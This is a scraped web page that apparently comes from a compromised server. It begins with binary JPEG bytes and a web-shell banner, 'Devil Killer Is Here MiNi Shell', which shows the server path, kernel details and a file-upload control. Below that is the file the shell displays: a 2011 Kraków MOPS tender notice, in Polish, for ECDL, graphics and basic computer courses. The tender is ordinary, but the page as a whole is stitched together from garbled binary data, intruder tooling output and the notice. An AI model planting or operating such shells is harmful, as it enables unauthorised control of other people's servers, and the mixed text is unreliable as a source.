JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110404/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110404/64282-N-2011.html

<p class="kh_header"><b>Kraków: Przeprowadzenie kursów: obsługi komputera z egzaminem ECDL, grafiki komputerowej, podstawy obsługi komputera dla beneficjentów Projektu Pora na aktywność</b><br>
<b>Numer ogłoszenia: 64282 - 2011; data zamieszczenia: 04.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie , ul. Józefińska 14/002, 30-529 Kraków, woj. małopolskie, tel. 012 6165420, 6165424, faks 012 6165428.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie kursów: obsługi komputera z egzaminem ECDL, grafiki komputerowej, podstawy obsługi komputera dla beneficjentów Projektu Pora na aktywność.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia: I część zamówienia:
Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursu obsługi komputera wraz z egzaminem ECDL wg następujących wytycznych: 
1.	Program kursu obejmuje 7 modułów tematycznych:
a)	Podstawy technik informatycznych,
b)	Użytkowanie komputerów,
c)	Przetwarzanie tekstów,
d)	Arkusze kalkulacyjne,
e)	Bazy danych,
f)	Grafika menadżerska i prezentacje,
g)	Usługi w sieciach informatycznych.
2.	Realizowane szkolenie będzie programowo zgodne z wymaganiami egzaminów Europejskiego Certyfikatu umiejętności Komputerowych.
3.	Po każdym module zostanie przeprowadzony egzamin ECDL w certyfikowanym ośrodku ECDL.
4.	Fakt zdania egzaminów z poszczególnych modułów zostanie odnotowany przez egzaminatora w Europejskiej Karcie Umiejętności Komputerowych, a w przypadku zdania wszystkich egzaminów zostanie wydany Europejski Certyfikat Umiejętności Komputerowych.
5.	Ilość uczestników kierowanych przez Zamawiającego: max 20.
6.	Ilość godzin dydaktycznych kursu: min 120, w tym min.80% zajęć praktycznych
7.	Wykonawca zobowiązany jest zapewnić:
a)	odpowiednie warunki lokalowe do przeprowadzenia kursu, niezbędny sprzęt, oraz wszystkie konieczne i zalecane materiały szkoleniowe,
b)	osobne stanowisko pracy, wyposażone w komputer, dla każdego beneficjenta,
c)	zajęcia będą prowadzone przez wykładowców posiadających zasób wiedzy, doświadczenie zawodowe i przygotowanie dydaktyczne zapewniając e właściwą realizację kursu.
8.	Przed rozpoczęciem zajęć Wykonawca poinformuje beneficjentów oraz Zamawiającego o wymogach niezbędnych do pozytywnego zakończenia kursu i otrzymania certyfikatu potwierdzającego uzyskanie kwalifikacji zawodowych.
9.	Wykonawca przekaże Zamawiającemu harmonogram zajęć zawierający daty, godziny i miejsce zajęć, co najmniej na 7 dni przed rozpoczęciem kursu. Jeżeli Zamawiający zgłosi beneficjenta do uczestnictwa w kursie bez zachowania terminu 7-dniowego, Wykonawca przekaże harmonogram zajęć nie później niż do następnego dnia roboczego. Wszelkie zmiany tego harmonogramu Wykonawca przekaże Zamawiającemu na bieżąco w miarę ich zaistnienia na adres mailowy sp@mops.krakow.pl.
10.	Zamawiający, a także podmiot kontrolujący Zamawiającego mogą skontrolować Wykonawcę w zakresie świadczonej przez niego usługi.

II część zamówienia:
Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursu grafiki komputerowej wg następujących wytycznych:
1.	Kurs obejmuje dwa moduły:
a)  Moduł I obejmujący:
- Kurs grafiki wektorowej CorelDraw,
- Kurs grafiki rastowej Photoshop,
- Kurs grafiki wektorowej i rastowej poziom 2,
- Kodowanie stron www HXTML CSS.
b)	Moduł II obejmujący:
- Kurs grafiki wektorowej CorelDraw,
- Kurs grafiki rastowej Photoshop,
- Kurs grafiki wektorowej i rastowej poziom 2,
- kurs Adobe Flash,
- kurs grafiki wektorowej Illustrator,
- kurs DTP Adobe InDesign,
- kodowanie stron www HXTML CSS.
2.	Kurs zakończy się egzaminem wewnętrznym.
3.	Ilość uczestników kierowanych przez Zamawiającego : max 6,w tym:
a)	Moduł I - 2 osoby,
b)	Moduł II- 4 osoby.
4.	Ilość godzin dydaktycznych kursu: 
a)	Moduł I-  min 75,
b)	Moduł II - min 145
w tym min.80% zajęć praktycznych.
c)	Kurs może się odbyć w ramach szkolenia dla większej grupy odbiorców.
5.	Wykonawca zobowiązany jest zapewnić:
a)	odpowiednie warunki lokalowe do przeprowadzenia kursu, sprzęt, spełniający minimum programowe niezbędne do prawidłowego działania programów graficznych oraz wszystkie konieczne i zalecane materiały szkoleniowe,
b)	osobne stanowisko pracy, wyposażone w komputer, dla każdego beneficjenta
c)	zajęcia będą prowadzone przez wykładowców posiadających zasób wiedzy, doświadczenie zawodowe i przygotowanie dydaktyczne zapewniające właściwą realizację kursu.
6.	Przed rozpoczęciem zajęć Wykonawca poinformuje beneficjentów oraz Zamawiającego o wymogach niezbędnych do pozytywnego zakończenia kursu i otrzymania certyfikatu potwierdzającego uzyskanie kwalifikacji zawodowych.
7.	Wykonawca przekaże Zamawiającemu harmonogram zajęć zawierający daty, godziny i miejsce zajęć, co najmniej na 7 dni przed rozpoczęciem kursu. Jeżeli Zamawiający zgłosi beneficjenta do uczestnictwa w kursie bez zachowania terminu 7-dniowego, Wykonawca przekaże harmonogram zajęć nie później niż do następnego dnia roboczego. Wszelkie zmiany tego harmonogramu Wykonawca przekaże Zamawiającemu na bieżąco w miarę ich zaistnienia na adres mailowy sp@mops.krakow.pl.
8.   Zamawiający, a także podmiot kontrolujący Zamawiającego mogą skontrolować Wykonawcę w zakresie świadczonej przez niego usługi.

III część zamówienia:
Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursu podstawy obsługi komputera wg następujących wytycznych:
1.	Program kursu :
a)	obsługa komputera:
- podstawowe czynności - logowanie do systemu operacyjnego,
	- tworzenie nowych kont użytkowników,
	- kopiowanie, przenoszenie i zarządzenie plikami i folderami.
b)	użytkowanie Internetu
- tworzenie kont e-mail,
- wysyłanie i odbieranie poczty,
- wyszukiwanie informacji w Internecie.
c)	obsługa programów biurowych MS Word, MS Excel
- tworzenie dokumentów tekstowych,
- formatowanie dokumentów,
- korzystanie z arkusza kalkulacyjnego.
2.	ilość godzin dydaktycznych kursu:
a)	w maju 2011r - 18,
b)	w kwietniu 2012r - 18.
3.	Ilość uczestników kierowanych przez Zamawiającego: 8 uczestników w 2011 r., 8 uczestników w 2012 r. 
4.	Zajęcia będą się odbywać w lokalu Zamawiającego przy ul. Semperitowców 13 w Krakowie, w dniach od poniedziałku do piątku, w godz. 8.00-18.00.
5.	Wykonawca zobowiązany jest zapewnić:
a)	5 laptopów z myszkami i ViFi,
b)	zajęcia będą prowadzone przez wykładowców posiadających zasób wiedzy, doświadczenie zawodowe i przygotowanie dydaktyczne zapewniające właściwą realizację kursu.
6.	Zamawiający zapewni:
a)	Salę szkoleniową,
b)	3 laptopy z myszkami.
7.	Przed rozpoczęciem zajęć Wykonawca poinformuje beneficjentów i Zamawiającego o wymogach niezbędnych do pozytywnego zakończenia kursu i otrzymania zaświadczenia.
8.	Kurs zakończy się egzaminem wewnętrznym.
Miejsce realizacji:
I część zamówienia:
w lokalu Wykonawcy w granicach administracyjnych Krakowa, miejsce lub lokal do zajęć winien znajdować się w odległości max 1 km od najbliższego przystanku komunikacji zbiorowej.
II część zamówienia:
w lokalu Wykonawcy w granicach administracyjnych Krakowa, miejsce lub lokal do zajęć winien znajdować się w odległości max 1 km od najbliższego przystanku komunikacji zbiorowej.
III część zamówienia:
w lokalu Zamawiającego, Punkt Aktywności Lokalnej Grzegórzki, ul. Semperitowców 13 w Krakowie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający może udzielić Wykonawcy zamówień uzupełniających w trybie zamówienia z wolnej ręki w okresie 3 lat od udzielenia zamówienia podstawowego, stanowiących nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający wymogi art. 22 ust.1   i nie podlegający wykluczeniu z tytułu art.24, którzy spełniają warunki dotyczące posiadania uprawnienia do wykonywania określonej działalności lub czynności tj. są wpisani do rejestru instytucji szkoleniowych, prowadzonego na podstawie Rozporządzenia Ministra Gospodarki i Pracy z dnia 27 października 2004 r. w sprawie rejestru instytucji szkoleniowych (dz. U. z 2004 r. nr 236 poz. 2365) lub do wykazu placówek, ośrodków i działalności oświatowej prowadzących kształcenie ustawiczne w formach pozaszkolnych, które uzyskały akredytację Kuratora Oświaty, prowadzonego na podst. Rozporządzenia Ministra Edukacji Narodowej i Sportu z dnia 20 grudnia 2003 r. w sprawie akredytacji placówek i ośrodków prowadzących kształcenie ustawiczne w formach pozaszkolnych (Dz. U. z  2003 r. nr 227 poz. 2247 z późn. zm.), jeżeli odrębne przepisy wymagają wpisu do wyżej wymienionych rejestrów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Aktualny odpis z rejestru instytucji szkoleniowych lub wykazu placówek, ośrodków i działalności oświatowej prowadzących kształcenie ustawiczne w formach pozaszkolnych, które uzyskały akredytacje Kuratora Oświaty, jeżeli odrębne wymagają wpisu do wyżej wymienionych rejestrów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany mogą dotyczyć takich kwestii jak: 1) termin realizacji zamówienia, 2) warunki płatności, 3) miejsce realizacji zamówienia, 4) zmniejszenie liczby uczestników.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie, ul. Józefińska 14. pok. 012.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.04.2011 godzina 10:00, miejsce: Dziennik Podawczy Miejskiego Ośrodka Pomocy Społecznej w Krakowie, ul. Józefińska 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Pora na aktywność.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> kurs: obsługa komputera z egzaminem ECDL dla beneficjentów Projektu Pora na aktywność.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursu obsługi komputera wraz z egzaminem ECDL wg następujących wytycznych: 
1.	Program kursu obejmuje 7 modułów tematycznych:
a)	Podstawy technik informatycznych,
b)	Użytkowanie komputerów,
c)	Przetwarzanie tekstów,
d)	Arkusze kalkulacyjne,
e)	Bazy danych,
f)	Grafika menadżerska i prezentacje,
g)	Usługi w sieciach informatycznych.
2.	Realizowane szkolenie będzie programowo zgodne z wymaganiami egzaminów Europejskiego Certyfikatu umiejętności Komputerowych.
3.	Po każdym module zostanie przeprowadzony egzamin ECDL w certyfikowanym ośrodku ECDL.
4.	Fakt zdania egzaminów z poszczególnych modułów zostanie odnotowany przez egzaminatora w Europejskiej Karcie Umiejętności Komputerowych, a w przypadku zdania wszystkich egzaminów zostanie wydany Europejski Certyfikat Umiejętności Komputerowych.
5.	Ilość uczestników kierowanych przez Zamawiającego: max 20.
6.	Ilość godzin dydaktycznych kursu: min 120, w tym min.80% zajęć praktycznych
7.	Wykonawca zobowiązany jest zapewnić:
a)	odpowiednie warunki lokalowe do przeprowadzenia kursu, niezbędny sprzęt, oraz wszystkie konieczne i zalecane materiały szkoleniowe,
b)	osobne stanowisko pracy, wyposażone w komputer, dla każdego beneficjenta,
c)	zajęcia będą prowadzone przez wykładowców posiadających zasób wiedzy, doświadczenie zawodowe i przygotowanie dydaktyczne zapewniając e właściwą realizację kursu.
8.	Przed rozpoczęciem zajęć Wykonawca poinformuje beneficjentów oraz Zamawiającego o wymogach niezbędnych do pozytywnego zakończenia kursu i otrzymania certyfikatu potwierdzającego uzyskanie kwalifikacji zawodowych.
9.	Wykonawca przekaże Zamawiającemu harmonogram zajęć zawierający daty, godziny i miejsce zajęć, co najmniej na 7 dni przed rozpoczęciem kursu. Jeżeli Zamawiający zgłosi beneficjenta do uczestnictwa w kursie bez zachowania terminu 7-dniowego, Wykonawca przekaże harmonogram zajęć nie później niż do następnego dnia roboczego. Wszelkie zmiany tego harmonogramu Wykonawca przekaże Zamawiającemu na bieżąco w miarę ich zaistnienia na adres mailowy sp@mops.krakow.pl.
10.	Zamawiający, a także podmiot kontrolujący Zamawiającego mogą skontrolować Wykonawcę w zakresie świadczonej przez niego usługi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. ilość godzin kursu - 20</li>
<li>3. liczba odstępnych terminów kursu - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> kurs: grafiki komputerowej dla beneficjentów projektu Pora na aktywność.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursu grafiki komputerowej wg następujących wytycznych:
1.	Kurs obejmuje dwa moduły:
a)  Moduł I obejmujący:
- Kurs grafiki wektorowej CorelDraw,
- Kurs grafiki rastowej Photoshop,
- Kurs grafiki wektorowej i rastowej poziom 2,
- Kodowanie stron www HXTML CSS.
b)	Moduł II obejmujący:
- Kurs grafiki wektorowej CorelDraw,
- Kurs grafiki rastowej Photoshop,
- Kurs grafiki wektorowej i rastowej poziom 2,
- kurs Adobe Flash,
- kurs grafiki wektorowej Illustrator,
- kurs DTP Adobe InDesign,
- kodowanie stron www HXTML CSS.
2.	Kurs zakończy się egzaminem wewnętrznym.
3.	Ilość uczestników kierowanych przez Zamawiającego : max 6,w tym:
a)	Moduł I - 2 osoby,
b)	Moduł II- 4 osoby.
4.	Ilość godzin dydaktycznych kursu: 
a)	Moduł I-  min 75,
b)	Moduł II - min 145
w tym min.80% zajęć praktycznych.
c)	Kurs może się odbyć w ramach szkolenia dla większej grupy odbiorców.
5.	Wykonawca zobowiązany jest zapewnić:
a)	odpowiednie warunki lokalowe do przeprowadzenia kursu, sprzęt, spełniający minimum programowe niezbędne do prawidłowego działania programów graficznych oraz wszystkie konieczne i zalecane materiały szkoleniowe,
b)	osobne stanowisko pracy, wyposażone w komputer, dla każdego beneficjenta
c)	zajęcia będą prowadzone przez wykładowców posiadających zasób wiedzy, doświadczenie zawodowe i przygotowanie dydaktyczne zapewniające właściwą realizację kursu.
6.	Przed rozpoczęciem zajęć Wykonawca poinformuje beneficjentów oraz Zamawiającego o wymogach niezbędnych do pozytywnego zakończenia kursu i otrzymania certyfikatu potwierdzającego uzyskanie kwalifikacji zawodowych.
7.	Wykonawca przekaże Zamawiającemu harmonogram zajęć zawierający daty, godziny i miejsce zajęć, co najmniej na 7 dni przed rozpoczęciem kursu. Jeżeli Zamawiający zgłosi beneficjenta do uczestnictwa w kursie bez zachowania terminu 7-dniowego, Wykonawca przekaże harmonogram zajęć nie później niż do następnego dnia roboczego. Wszelkie zmiany tego harmonogramu Wykonawca przekaże Zamawiającemu na bieżąco w miarę ich zaistnienia na adres mailowy sp@mops.krakow.pl.
8.   Zamawiający, a także podmiot kontrolujący Zamawiającego mogą skontrolować Wykonawcę w zakresie świadczonej przez niego usługi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. ilość godzin kursu - 20</li>
<li>3. liczba dostępnych terminów kursu - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> kurs: podstawy obsługi komputera dla beneficjentów Projektu Pora na aktywność.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursu podstawy obsługi komputera wg następujących wytycznych:
1.	Program kursu :
a)	obsługa komputera:
- podstawowe czynności - logowanie do systemu operacyjnego,
	- tworzenie nowych kont użytkowników,
	- kopiowanie, przenoszenie i zarządzenie plikami i folderami.
b)	użytkowanie Internetu
- tworzenie kont e-mail,
- wysyłanie i odbieranie poczty,
- wyszukiwanie informacji w Internecie.
c)	obsługa programów biurowych MS Word, MS Excel
- tworzenie dokumentów tekstowych,
- formatowanie dokumentów,
- korzystanie z arkusza kalkulacyjnego.
2.	ilość godzin dydaktycznych kursu:
a)	w maju 2011r - 18,
b)	w kwietniu 2012r - 18.
3.	Ilość uczestników kierowanych przez Zamawiającego: 8 uczestników w 2011 r., 8 uczestników w 2012 r. 
4.	Zajęcia będą się odbywać w lokalu Zamawiającego przy ul. Semperitowców 13 w Krakowie, w dniach od poniedziałku do piątku, w godz. 8.00-18.00.
5.	Wykonawca zobowiązany jest zapewnić:
a)	5 laptopów z myszkami i ViFi,
b)	zajęcia będą prowadzone przez wykładowców posiadających zasób wiedzy, doświadczenie zawodowe i przygotowanie dydaktyczne zapewniające właściwą realizację kursu.
6.	Zamawiający zapewni:
a)	Salę szkoleniową,
b)	3 laptopy z myszkami.
7.	Przed rozpoczęciem zajęć Wykonawca poinformuje beneficjentów i Zamawiającego o wymogach niezbędnych do pozytywnego zakończenia kursu i otrzymania zaświadczenia.
8.	Kurs zakończy się egzaminem wewnętrznym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</p></li>
